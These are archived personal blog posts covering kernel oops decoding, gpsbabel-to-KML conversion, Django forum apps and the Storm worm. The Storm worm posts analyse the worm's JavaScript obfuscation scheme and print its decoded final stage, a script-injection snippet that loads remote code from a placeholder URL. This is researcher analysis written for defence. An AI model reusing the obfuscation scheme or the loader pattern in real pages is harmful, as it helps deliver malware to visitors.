kernel: [<c0102d3f>] sysenter_past_esp+0x54/0x75

Think of this as analogous to “bt” in gdb, it is generated by show_trace_log_lvl in arch/i386/kernel/traps.c. But be aware that it can be broken, what if your bug involved mucking up data on the stack?

What we know at this point is that the put_page where our problem occured was called by skb_release_data (aha! networking code!), which in turn was called by kfree_skbmem, and that by mkyDestroyPacket. That last item, from the monkey_pkt_eater module comes from our propriety code. Our suspicion is that we have, for some reason, given some bad data to kfree_skbmem.

kernel: Code: c0 8b 01 01 c2 83 fa 10 89 11 7f 05 83 fa f0 7d 0d f0 01 15 fc 8f
    40 c0 c7 01 00 00 00 00 c3 8d 76 00 8d bc 27 00 00 00 00 89 c2 <8b> 00 f6
    c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0 

Personally I find this the most exciting part of the oops. A sequence of hex values, joy! But what is the “Code:“? Quite simple really. The kernel takes the value of EIP, subtracts 43 then prints out 64 bytes from that point, marking the byte at EIP with <..>. I.e. it is a hexdump of the section of machine code being run at the time the oops occurred. And this means we can disassemble.

But it might not be so straight forward as we’d like. That “-43” means the hex-dump could start anywhere, maybe right in the middle of an instruction. So I suggest either removing everything prior to EIP (remove everything before <8b>) or starting at the symbol address that EIP maps into. The latter option is only going to work if the offset from the symbol is less than 43, in our case we’re lucky because in put_page+0x2/0x40 we’re given that the offset is only 2 bytes, so we can safely cut the code down to this:

    89 c2 <8b> 00 f6 c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0 

Now we can employ trusty xxd to reverse the hex to a binary file:

:; echo '89 c2 8b 00 f6 c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0' | 
    sed 's/[^0-9a-f]//g;s/^/0: /' |  
    xxd -r  -c 256 > code.bin

What do we do with this code.bin file? Our next friendly tool is objdump, which won’t accept data from STDIN or using <(...), thus the temporary code.bin file rather than a pipe. With objdump we do and get this:

:; objdump -b binary -m i386 -D code.bin 

code.bin:     file format binary

Disassembly of section .data:

0000000000000000 <.data>:
   0:   89 c2                   mov    %eax,%edx
   2:   8b 00                   mov    (%eax),%eax
   4:   f6 c4 40                test   $0x40,%ah
   7:   75 1e                   jne    0x27
   9:   8b 42 04                mov    0x4(%edx),%eax
   c:   40                      inc    %eax
   d:   74 1f                   je     0x2e
   f:   f0 83 42 04 ff          lock addl $0xffffffff,0x4(%edx)
  14:   0f 98 c0                sets   %al

Some really hard-core people familiar with machine code read it like assembly, and can easily work out the instruction sequence prior to put_page too. But if that was you then you wouldn’t be reading this I think.

What we know now is that the oops occurred in the assembly above at offset 2, at “mov (%eax),%eax“. Which is moving the word at the address stored in %eax into %eax. We can surmise that our invalid address is stored in %eax, and looking further up the oops, at the register dump, we see that the value in %eax is 0x68230a7d and that is the bad address that the very first line of the oops gives us. We now know the exact problem, but it isn’t really any use to use without some context isn’t it?

Thinking a little further, we know that offset 0 in the assembly code above is the entry point of the put_page function so the only code belonging to the function prior to where the error occurs is “mov %eax,%edx“. Logically it seems that an argument to the put_page function was provided in %edx (which the register dump shows also contains 0x68230a7d), and that this argument provides the bad address.

At this point we still don’t have any useful context and really need to start looking at a more complete picture of the code involved. That’s the subject of the next entry in this series.

[With some amusement I note that during the week I was dealing with the problem that prompted me to write this stuff the topic of “decoding oopses” became somewhat popular on LKML! Heh, great timing. This renders my own efforts somewhat redundant, oh well.]

Crafting KML from Garmin GPS Data

Note: This entry has been restored from old archives.

This entry explores my journey from getting a Garmin eTrex Vista HCx GPS unit to generating a KML file that shows information I’ve gathered on my GPS via the Google Maps website (and, in theory, also Google Earth). It’s only lightly technical, more a review of the process than an instructional reference. I expect, and hope, there are more efficient ways to go about doing what I’ve done here.

I mentioned a little while ago that a recent addition to my toybox is a Garmin eTrex Vista HCx (AmazonUK). I’ve used this a lot over the last few months and am very happy with the purchase. The primary reason for having the device is that we like to ramble around the countryside a lot. A stint of Rogaining and Orienteering in high-school left me with very good map navigation skills, which have served me well. But when trekking around, especially moving at speed, referring to a paper map regularly can be a bit of an encumbrance. Enter the GPS, it fits in my hand and always tells me exactly where I am. There’s one important thing to be aware of though: it’d really not be so much use without a good map set.

The map set I have is Garmin TOPO Great Britain (AmazonUK). I don’t have much to compare it to in GPS-land. What I can say is that it is better for walkers than all the online mapping I’ve seen, except for those that use present sections of the Ordnance Survey maps (like MultiMap used to at high zoom levels, but it just seems to use Google Map data now). Additionally, this Garmin map is actually derived from the Ordnance Survey data. This is a huge bonus for walkers. Any UK rambler should know the greatness of the OS Explorer and Landranger maps sets. With the TOPO Great Britain maps on your GPS you’ll have the great feature that contours shown on the GPS unit are the same as those on the OS maps — making it very easy to place yourself on an OS map.

An OS map you say? Yes, I don’t consider the GPS to be a complete replacement. First, in deference to screen size, the maps are nowhere near as detailed as the OS maps. They have roads, water features, contours, and some terrain information — but they lack all the additional details found on the OS maps. The most important thing lacking on the Garmin map is full coverage of all the footpaths, bridleways, and byways marked on the OS maps. That sucks quite a bit.

The other obvious great features of this GPS unit are that it can store the path of your travels (you can save several tracks, I did this to map ski slopes and lifts individually in Ylläs), and you can mark waypoints for locations of interest. Then you can move this data between the unit and a PC. Walking geek heaven!

It isn’t all plain sailing though. Garmin sell their GPS units, and then want to make a ton more money on maps. As it comes the GPS isn’t a lot of use for walkers, it has only main roads loaded. So as well as spending more than 200 quid on the unit you’ll need to spend a further 100 quid for the UK maps. Ouch! There are a lot of complaints to be found on the web about this particular point, people don’t realise that the maps the Garmin units come with are rather crap. This seems to be a factor in a lot of negative reviews for the various eTrex units.

The eTrex Vista HCx I got is top of it’s line, you can spend a little less by getting one without a barometric altimeter and compass. Such as the Garmin eTrex Legend HCx, or one of the Cx models which are slower and less accurate than the HCx ones (but have longer battery life). Garmin actually provides a nice feature comparison tool on their site, here’s the eTrex models with SD card slots compared. The altimeter and compass are features that I’m a bit iffy about anyway, after three months of use. The altimeter needs regular recalibration and since you almost always have a, more accurate, 3D GPS lock it is redundant, and the compass doesn’t seem as stable as a “real” one.

You’ll also need to spend a little extra on a microSD/transFlash card. You don’t need a huge one though, I’m using a 256MB card and it fits the entire set of maps covering greater London in a fraction of it’s space. You could probably fit the entire map set in a 1GB card (a total guess). There’s not much point buying a new one that’s smaller than though, they’re as cheap as chips (har har) now. I picked up a 1GB one for about 8 quid (they’re 6 now) and put it into another device to free up the 256MB card.

The other stormy waters are around their MapSource software (“free” with the unit, thankfully) and their documentation is pretty crap. It’s isn’t abysmal, but as someone extremely familiar with the world of software my opinion is that it is firmly in the massive ranks of the “mediocre”. Of course, I’m also a Linux geek so using their software has an added disadvantage for me. I’d have to reboot into Windows to use it, maybe it’ll work in Wine? Maybe I’d rather be doing other things with my time?

Luckily for us Linux dweebs there are plenty of industrious monkeys out there pushing their valuable hours into great software! The biggest and hairiest monkey is Google. Their online maps setup is geek heaven, and Google Earth is software bling at it’s finest. Now, Google Earth can supposedly hook up with my GPS unit and make sweet love… if I pay for the non-free version that is. I don’t have anything against paying for this, but have refrained thus-far since I’ve had terrible problems getting Google Earth to even work on my Ubuntu or Debian systems. sigh

So, I need a bridge. This bridge is given to the world in the form of gpsbabel. It speaks several map-data and GPS-device languages fluently! Brilliant!

What I typically want to do with my GPS data is push it from the device to a format I can use to display the data on the Google Maps website. The desired format is Google’s “KML” (tutorial/examples), the same file format that drives Google Earth.

For purposes of demonstration the rest of this post uses my GPS unit with a load of tracks and waypoints on it I saved while I was in Finland, the goal is to get a neat map of the area I visited out of the Garmin and onto Google. I had other data on the device though, so I chose a lat-long point from one of my Finland waypoints and only grabbed data within a 200 mile radius of that point. To do this we employ the ‘garmin‘ driver to suck the data, the ‘radius‘ driver to filter out unwanted points, and the ‘kml‘ driver to poop the data out to a nice KML file:

:; gpsbabel -i garmin -f /dev/ttyUSB0 -w -t 
            -x radius,lon=24.171808,lat=67.604049,distance=200 
            -o kml,points=0 -F gpsbabel.kml

Note the ‘points=0‘, if you don’t do this you get a “waypoint” for every point in your tracklog. If you don’t need these it is best to avoid them, my KML file was 137kB without the points and 34MB with them, ouch!

Nothing is simple though. Now I want to prettify my KML. This involved going through by hand and editing the marker names and descriptions, and adding in CDATA HTML sections to embed links and images for waypoints. The former is mostly necessary since the GPS doesn’t let names be longer than 12 chars, not enough, and the transfer maps non-ascii characters (i.e. Unicode) to ‘$’. Note that for names you can use XML-permitted entities like &amp; but not most HTML ones, for ä you can’t use &auml; you’ll need to use Unicode.

Now I want my own waypoint icons and path colours. This requires removing the styles set by gpsbabel and defining a set of your own. For example I want a style for markers that show hotels, I define this:

    <Style id="waypoint_hotel">
      <IconStyle>
        <scale>1.2</scale>
        <Icon>
          <href>http://maps.google.com/mapfiles/ms/micons/lodging.png</href>
        </Icon>
      </IconStyle>
    </Style>

There’s a useful link for the “standard” Google Maps icon set here.

I also want to define my own line widths and colours for different classes of track. Good to distinguish between walking routes and bus routes, especially good in this case for the different grades of ski slope! Here’s a sample line style:

    <Style id="track_ski_easy">
      <LineStyle>
        <color>aaff3333</color>
        <width>4</width>
      </LineStyle>
    </Style>

Note the <color> is not as the HTML-familiar would expect! The hex fields are ‘aabbggrr’, that’s aa=alpha, bb=blue, gg=green, rr=red. So a 50% transparent cyan line is actually 80ffff00. Such a simple thing, yet it breaks my rrggbb indoctrinated brain!

Oops! Height and distance data embedded in KML description fields by gpsbabel is in miles and feet, I hate miles and feet! Maybe gpsbabel can be asked to use metric units but I don’t see an obvious way to tell it to do so. (Update: Thanks to the “Chief (GPS)Babel-head” (see comments) I now know that the ‘kml‘ driver has a ‘units‘ argument, i.e. ‘units=m‘ — I didn’t RTFM well enough.) Anyway, I’ve just put loads of effort into customising my KML, so time to do it with perl, yeah, sure, ewww. shrug

perl -ne 
  'if (/(d*.d*) mi/)
      { $x = $1 * 0.3048; s/$1 mi/$x km/; print $_; }
   else
      { print $_; }' 
  YllasAkasSkiHoliday-26.kml > YllasAkasSkiHoliday-27.kml

It took me a whole evening to work through all this and get my final KML. I hope it’ll be easier next time around. It certainly isn’t for everyone.

The best way to describe all the details is by example, so check out my full Ylläs Ski Trip KML for the gory internal details, and here’s a link to my Ylläs mapping data displayed by Google Maps. The iframe to the right (assuming you support iframes) is zoomed in on the part of the map data showing the ski slopes and lifts that I mapped. The dark grey lines are the lifts (recycle signs mark the bottom of the lift), the green (very easy) and blue (easy) lines are the slopes. It’s cool how my weaving back and forth (at speed) on the slopes is captured so well by the GPS!

In conclusion:

  1. It might look like horrid process, it might have taken a lot of effort, but I did enjoy it.
  2. That said, I hope that Google Earth can do this WYSIWYG style or something. That’d make this sort of thing much more friendly.
  3. Joy, one more dependency out of the way so I might get that write-up of the Yllä ski trip finished.
  4. Don’t forget than you can use gpsbabel to upload data from KML files to your GPS too!
  5. I wanted a topo map of Finland for the Garmin, I found it, but it makes the GB Topo map look cheap! At least you can buy it in parts, at the link given it is 99 euro per CD, and Finland is covered by 6 CDs.

Django Forum Software

Note: This entry has been restored from old archives.

Update 2008-02-25 20:24: I’ve only made small progress on examining each of the options below as I haven’t had much time for personal projects in the last couple of months. An important point to note is that some of these didn’t work with Django-trunk, so certainly check that if you’re not working with the development version (conversely, some might not work with 0.96 I guess.) Note, from the comments, Antti Kaihola has created a “Django Forum Apps Comparison” on the django wiki, it’s well worth checking that out as it’ll be more complete and more up to date than my list.

I’ve been toying with a community site recently. The logical starting point for the code behind it is discussion functionality. The idea is to take some existing code that does “forums” well and use this as the kernel that the community site is built around. Nothing is ever so easy though, the ‘net and developer communities have grown so huge that we’re not talking a needle in a haystack but finding the right needle in a haystack full of needles. There’s a scattering of good needles, but a lot of blunt of downright broken ones.

I’ve locked myself into Django now, but even having already determined the web framework to use (i.e. choosing a smaller haystack) the task isn’t trivial. I think that a general issue here is this exact experience I’m having, people give up eventually, try to spin their own, get big ideas, publish their half baked code, and make it just a little harder for the next person trying to find pre-existing functionality. It doesn’t help that Django’s relatively young, I don’t make life easy for myself sometimes!

Here’s my small attempt to work against the trend. I’ve gathered a list of the Django forum/discussion software I’ve found and associated each project with any further useful information that might help the decision of which to use. I’ve filtered out anything that was clearly broken, but don’t know the level of completeness of everything listed here.

Also, I’m sure there’s other projects out there I’ve missed! I’ll update this page if I find anything new.

I’m not recommending any of these, maybe that’ll come later once I’ve actually decided which one to work with.

Ross’s Django Forum (the django-forum)

“Simple Django Forum Component”

This seems to be the most linked-to Django forum software out there. It seems basic, but I haven’t tested it or seen a demo. I’ve seen various blog comments commenting on either it’s “lack of features” or “ease of installation and use” — how many “features” do people really need?

Jonathan’s Django Forum

Almost got this one mixed up with django-forum above. At least it has a demo site! The demo looks like it has all the basic expected components working.

counterpoint

“forum written with django”

Very little information about this out there, the code is available though. I’ve seen a comment on a blog post from Nov 29th 2007 that says “missing much functionality”, it’s a young project though and that was a month ago.

snapboard

“Python Forum/Bulletin-Board for Django”
“SNAPboard: S(imple), N(imble), A(ttractive), P(ython) board”

In a way this one seems to do the best job of selling its self. The Google Code frontpage and wiki (documentation) are good. However activity on the project has dropped off and a new maintainer has come on board recently (December 11th according to a forum post).

Django Discussion (django-discussion)

“A generic discussion application for Django”

I’m guessing this is the same author as the second item in this list, pretty unlikely coincidence otherwise? Anyway, the code seems to be different, so a different project?

  • Google Code: http://code.google.com/p/django-discussion/
  • Owner: Jonathan Buchanan (Same author as the second forum in the list I’m guessing, but the code seems very different.)
  • Initial checkin: 2007-03-15
  • Latest update: 2007-12-08 (only 9 changes since creation, but recently active at least)

Diamanda “MyghtyBoard”

“Diamanda Wiki and Forum”

Diamanda isn’t only a “forum”, it’s a site-builder toolkit that contains a complete “forum” subcomponent called “MyghtyBoard”. The forum seems to possess all the expected features. Development started quite some time ago and was regular up until early 2007, reached a degree feature completeness maybe? A recent “bug report” is “rewrite code for better look and use” with the response “I will in time :)” (6 days ago).

Sphene Community Tools

“Django Forum Application and Django Wiki Application”

Like Diamanda, this is a toolkit that happens to include a forum. I’m assuming that the forum on their site represents a demo of SCT in action. This project looks like the most active of the lot and seems to be quite well documented.

ENDE

That’s the lot for the moment.

Bad Weather

Note: This entry has been restored from old archives.

The last two days have been somewhat joyous in a less than traditional sense. Two whole days with all computers shut off! OK, so not that much different from our recent holiday without work/computers, but more relaxing.

The reason for the title is twofold, firstly the weather here really is rather shit. It’s England! What should I expect? Christmas day was chilly and wet, at least on boxing day there was a little sunlight. Dreaming of a white Christmas around London? Not much chance these days it would seem. This is my third in the UK, the first was white thanks only to a heavy frost, there was a little snow around the period but it wasn’t so cold that I didn’t spend the day on my bike in Wendover Woods. Last year it was cold at least. This year it isn’t even chilly, there isn’t one 0 or sub-zero day predicted in the entire last week of the month! Today has a predicted minimum of 9 — I can quite comfortably wear just a thin t-shirt under an unbuttoned jacket. Oh well.

The other bad storm is one of 2007’s old favourites, the Zhelatin/Storm/Nuwar “worm”. After somewhat of a lull in seeing emails from this network I suddenly got one on the 23rd, as I mentioned on Monday.

This turned out to be the first of many as the network pumped out a full-scale assault capitalising on the jovial season, both Christmas and New Year. Taking advantage in two ways I think: 1) people probably are sending a lot of stupid email right now so it may be more likely that people follow the evil links, 2) A lot of people, including those in the security industry and the IT-shops responsible for maintaining corporate security, are on holiday so the “good guys” may have a slower response time.

The latter point is worth some thought. I’m sure it has been discussed before: computers don’t have holidays, crims take advantage of holidays, most normal people let their guard down on holidays. Good news for botnet herders. As I mentioned earlier in the week the malware payload wasn’t detected by any of the large-market-share AV engines, the biggest player to detect some of the samples I tried was Kaspersky (finding accurate market-share figures is difficult, suggestions on the net for KAV are between 5 and 1 percent). As has now been clearly established, I’d think, the malware writers test against the biggest AV engines. We can get a good picture of which engines they’re testing with by rounding up as many of these jolly-Storms as possible and scanning them to see which engines, when loaded with a pre-mailout database, detect close to 0% of the samples. The list you’ll find isn’t all that surprising.

It’d be really nice to have a good statistic on the size of the botnet on December 20th versus the size on January 7th. But all botnet size estimates are generally a product of bad guesstimation, we can’t expect anyone to know the numbers except the ones in control.

I’m becoming more pessimistic about the situation as time goes on. The concept of a “virus filter” product seems to have been proven fatally flawed. Whether detection takes place via signatures or “heuristics” (in my opinion this is little more than complicated signatures) the approach is reactive. Either to specific malware or to specific exploits, the latter gets a lot of press as “generic” detection usually classified as “heuristic” but in the end is just reactive detection taken from a different angle. AV engines do have their place, but they’re not a solution — certainly not anymore. A small thought, and privacy advocates would hate this thought, is that maybe the AV vendors need to make their software 100%-report-to-base. Try to take some of the testing ability away from the criminals? Could this even be workable, what information could you report to base that’d help? How long would it be before the bad guys subverted the process or simply circumvented it… probably not long. sigh

I guess this is why the security industry is diversifying into more elements of command and control, maybe there is some light at the end of the tunnel? Of course is it likely that anything of this sort is best done at-or-below the OS level, thus by the OS vendor, but when Microsoft tried to do this for Vista there was an all-out cry of foul from the AV industry! Protecting themselves, or protecting users from the likelihood that Microsoft would get it wrong? A bit of both I expect.

In this direction lot of noise was made about one thing in the last year that to me smells like a load of of bollocks: virtualisation. It’s a very neat geek-toy that has spawned both it’s own industry around maintaining systems and has been co-opted by the security industry in a way that stinks of “silver-bullet”. The former works for me, but I think we want to keep in mind that virutalisation used this way is just an evolutionary step. Virtualisation for robustness/etc is a neat replacement for things like telnettable power supplies and Dell DRAC (remote administration) hardware. Security tends to be fitted in from a perspective of keeping an eye on things from the outside. We like this image because it works fairly well with physical-world security systems. My guess is that it isn’t going to work out quite as neatly or easily as hoped when it comes to anti-malware. I think the best anti-virutalisation FUD I’ve seen came from Theo, of OpenBSD fame.

[Update: In case it isn’t as blindly obvious as I thought, I agree with Theo de Raadt’s FUD (though I don’t understand why anybody thinks my agreement or labelling matters). sigh “FUD” is a just TLA, please attach less emotion to it Internet randoms. I’m wasting my time since the complaint I received was clearly derived purely from the sight of the TLA and the context ignored. Anyway, FUD = “Fear, Uncertainty, and Doubt” and in my mind is a mere function of marketing. Negative marketing based on perceived flaws in the security sphere is a case of FUD (since this is what it causes), sometimes for good (being informative), sometimes for bad (being misleading). Pro-virtualisation-for security people will label de Raadt’s opinion as FUD in the traditional sense, but I bag up what they see as smelly manure and feed it to my roses. I apologise for going against the grain of the TLA and upsetting a poor sensitive soul or two. To repeat: I, in my non-expert opinion, am more convinced by Theo’s FUD than the FUD from the other side of the argument. If it makes you feel better execute a mental s/FUD/marketing/g or just go away.]

Still, we have to grasp at what straws present themselves. (Remembering to let go of the ones that have burnt all the way down to our fingers.) I try to remind myself that entirely giving up hope is not the correct response. Especially while people are profiting from criminal acts that take advantage of the industry’s current failure to adequately deal with the problem.

At this moment, given a corporate network to run and short of “running with scissors”, I’d be focusing attention on environment control. Mostly meaning various approaches to controlled execution. I don’t think it’s an easy path, but does anyone expect a solution to really be “easy”? Hah! There’s a strong chance it’d just turn into another reactive scene, say we allow IE to run, fine, then malware runs it’s own code as part of IE. (Through one of virtually limitless vectors, from buffer buffer overflows inserting actual machine code to simple exploitation of design flaws in JS/VBS/Flash/plugin-X/technology-Y.) What about the much-maligned (at least it is in OSS/FSF circles) TPM approach? (Maybe just simplified virtualisation that’ll just come with a heap of it’s own new flaws.)

Network segregation should offer some relief and damage control. Do users really always need to access email/web from the same machine they access the IRS/HMRC/etc database from? At least if there is an infection (inevitable?) it can only go so far. This is heading into DLP territory though, which is a different problem and mostly the bugs that need to be fixed are in process and people.

Have we given up on user education yet? It’s bloody difficult, but I hope not. We can’t really expect people to always do the right thing, just as we can’t always expect programmers who know they should use validate all user data to always remember to do so (humans tend to be lazy by preference!). That said, the situation is certainly worse if they don’t even know what the right/wrong things are!

It’s easy to become despondent. I’m certainly not all that happy with the industry that I, in a small way, am part of. Taken as a whole the last year or two has been pretty abysmal. Surely things can only improve from this point?

Storm Worm Vigenère

Note: This entry has been restored from old archives.

A small hobby of mine to pick apart JavaScript/ECMA obfuscation such as that used by the Zhelatin/Storm/Nuwar “worm”. My usual approach, which is certainly inefficient, is to grok the actual code by translating it to Perl. I’ve written about this before in “Someone Doesn’t Like Kaspersky“.

I don’t usually have time, after wasting much in the process of grokking, to write about these critters and I don’t expect that to change much! Time is so hard to come by! But after looking at some of the code with recent Storm mailings I think it’s worth noting the evolution.

The previous obfuscation I’ve written about is simple application of “xor encryption”, and much of what I’ve seen has been a variation on this at a similar level of simplicity.

The basic xor case worked along the lines of the following pattern.

    function decode(A,B) {
        ...
        eval(C);
    }
    decode(ciphertext,key);

In this case the key (and thus ciphertext) value was randomly generated for different visits to the page. In the decode function B is applied byte-by-byte to A to gain the plaintext C. Usually this processing was xor (^) and was further complicated with a URI decode or something of that ilk.

The sample I have looked at most recently has the following form.

    function X(Y) {
        ...
        eval(Z);
    }
    X(payload);

The key differences are that the function name (X) is now a variable and the obvious key input is gone, which hints at something. What’s changed inside the code? Well, working from the final decrypt up to the start of the function, this is what happens (somewhat simplified, but this is the core pattern):

  1. An array of 8 bytes is used as a key to shift the values in the input array in the manner of a classic Vigenère cipher applied mod-256).
  2. The key array is obtained be encoding a 32 bit value (i.e. 2309737967) to hex (0x89ABCDEF) and using the ASCII value of each hex digit to populate the key array ([56, 57, 65, 66, 67, 68, 69, 70).
  3. The 32 bit value is obtained by condensing an array of 256 integers (array256) and the text of the decode function (funcText) into an integer! The method iterates over characters in funcText using the byte values as lookup indexes in array256. Complete detail: key=0xFFFFFFFF; then for i in 0 to length(funcText) do:
    key=(array256[(key^funcText[i]) & 0xFF] ^ ((key >> 8) & 0xFFFFFF))
  4. The text of the decode function is obtained with arguments.callee.toString(), which has non-word chars stripped out and is converted to all-caps. Thus the importance of the function name X as an input parameter to the obfuscation, it doesn’t stop there as the text for the rest of the function body is also part of this key material and is full of randomised variable names. As you may have guessed, is is the random function and variable names that change from one downloading of the script to another — rather than just the xor key.
  5. The array of 256 integers is generated from a simple algorithm with a seed value, no need to detail it I think. It’s worth observing that between the different downloads of the script I saw the effective seed value didn’t change so this array remained constant.

Certainly much more complicated than the old xor code! But, I’d hope, a waste of time — since AV suspicious-script detection should work off generic patterns visible in the script from inspection rather than relying on the variable details. Still, only 3 AV engines on virustotal.com thought this script was worth noting as “generic obfuscated HTML”, but I don’t know what script/browser components they have enabled so I wouldn’t trust these out-of-context results. Many AV products exhibit different, usually more paranoid, behaviour when scanning in-browser data and HTTP at the gateway. And, looking at the whole Storm picture, this little snippet of code is just part of the delivery mechanism, it’s more important that the actual browser exploits and malware executables are caught!

Anyway, back to the script, this thing unwraps like a matryoshka doll. The plaintext is the same algorithm over again with new randomly generated function/variable names and a new ciphertext. The new ciphertext is much shorter though and after decoding we’re finished with this sample. The end result is javascript that generates a script DOM element and appends this to the document.

    var script = document.createElement("script");

    script.setAttribute("language", "JavaScript");
    script.setAttribute("src", "<nasty_local_url>");

    document.body.appendChild(script);

The most interesting item is the sample is this use of arguments.callee.toString() as key material. No doubt a direct defence against the usual malware-researcher practice of changing the final eval into an alert to expose the plaintext. While an admirable attempt at making life harder for researchers it’s not difficult to circumvent, just create a new variable assigned to the text “function X(Y) { ... }” and use this in place of the arguments.callee.toString() and good old alert should do it’s usual trick (then unwrap the next shell of the matryoshka). (Yes, “function” all that are included, though braces/punctuation don’t matter in the samples I have since an s/W//g is applied to the text)

The other “new technology” here is intriguing but not remarkable, using Vigenère instead of xor seems a curiosity more than a real advance (they’re certainly not doing it to hide the tell-tale use of the xor operator in a loop since they use xor in the key generation loops). Honestly, is looks just like some geek having fun, like me… but in this case we have a bad geek. Tut tut.

I’ve put a de-obfuscated and commented version of the script code up as well as a page containing active JavaScript that demonstrates the code. (Don’t worry, the active page’s payload is just an “alert” call!)

Christmas Storm

Note: This entry has been restored from old archives.

It’s been a while since I’ve had a Zhelatin/Storm/Nuwar mail get through to my inbox. Just in time for Christmas I get a shiny new one! It wishes me “Merry Christmas Dude” and provides a suitable URL for the season, no suspicious IP address link for this special occasion.

This one is a little different to previous efforts I’ve looked at. The embedded javascript isn’t malicious at all, in fact it is JSnow v0.2 complete with copyright notice. Snow! Joy! Is our favourite bot-net wishing us all a good Christmas out of good old fashioned social benevolence? Ha, fat chance! The page displays for us a set of scantily clad Mrs Clauses, enticing us to click on them for more. The link is to stripshow.exe, just less than 50% of the scanners on virustotal.com detect this at the moment. The list of ones that miss is conspicuously a round-up of the set with the largest market-share (interspersed with the ones that simply suck), this shouldn’t be any surprise these days.

It doesn’t stop there though, in a further effort the page embeds a javascript
in a I-Frame. And behold! We see the expected obfuscation code. So, in the end this isn’t really much different to previous sightings. I guess this strategy is still paying off for the crims behind it. It’s a sad indictment against the state of Internet security and security awareness that even after so many months this seemingly still works.

This time the javascript obfuscation is far more complex than others I’ve seen. Rather than a couple of simple translations we have several loops employing shifts and a variety of other bitwise operators (didn’t even know ECMA had an LSR operator). I guess they’ve invested some of their research time into this aspect of their code. At the moment only three of the virustotal.com scanners have anything to say about this and that’s just something along the lines of “generic obfuscated HTML”.

I wish people an infection-free Christmas. Have a good one.